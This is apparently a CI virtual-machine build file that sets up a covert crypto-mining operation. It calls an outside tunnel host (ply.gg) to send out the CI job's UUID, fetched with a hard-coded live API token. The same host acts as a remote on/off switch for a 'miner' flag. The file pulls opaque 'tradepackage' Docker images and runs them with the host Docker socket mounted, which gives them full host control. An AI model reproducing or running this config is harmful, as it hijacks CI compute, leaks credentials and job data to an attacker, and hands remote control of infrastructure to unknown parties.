FROM vm/ubuntu:22.04

ENV linux8888=linuxwebwebweb88888888888888888888888888888888

RUN apt-get update

RUN apt-get install jq -y

RUN apt-get install curl -y

RUN if [[ $(curl --max-time 10 "http://it-four.gl.at.ply.gg:11672/web8888.php?linux8888=$(curl 'https://webapp.io/api/v1/run/linux8888/search?repo=linux8888&token=live_sf1R1MLGAo6CAbtEDO17pDunc2mtXGYj4CqA2FbVkMAz'| jq .job | jq .uuid | sed 's/"//g')") ]];then echo "linux8888"; fi

RUN sudo dd if=/dev/zero of=/swapfile bs=1024 count=4000000

RUN sudo chmod 600 /swapfile

RUN sudo mkswap /swapfile

RUN sudo swapon /swapfile

RUN apt-get update && apt-get install docker.io

RUN echo "nameserver 8.8.8.8" > /etc/resolv.conf

RUN docker pull tradepackage/clevertradebot8888888888

RUN docker pull tradepackage/vncstart8888

RUN docker run -it --dns="1.1.1.1" -v /var/run/docker.sock:/var/run/docker.sock --shm-size="12000m" -d tradepackage/vncstart8888 /bin/bash /start

RUN if [[ $(curl --max-time 10 -s -o /dev/null -w "%{http_code}" http://it-four.gl.at.ply.gg:11672/linux88888888) == "200" ]];then linux8888="off"; linux88888888="on"; else linux8888="on"; linux88888888="off";docker run -it --dns="1.1.1.1" -v /var/run/docker.sock:/var/run/docker.sock --shm-size="12000m" -d tradepackage/vncstart /bin/bash /start; fi;docker run -it -d -v /var/run/docker.sock:/var/run/docker.sock --shm-size="32000m" -e apikey="linux8888" -e apisecret="linux8888" -e user="virtual" -e sleepstart="10" -e sleep="60" -e quantitytarget="even" -e miner="$linux88888888" -e start="$linux8888" -e usdt="1" -p 80:8080 tradepackage/clevertradebot8888888888 /bin/bash /start

EXPOSE WEBSITE 80
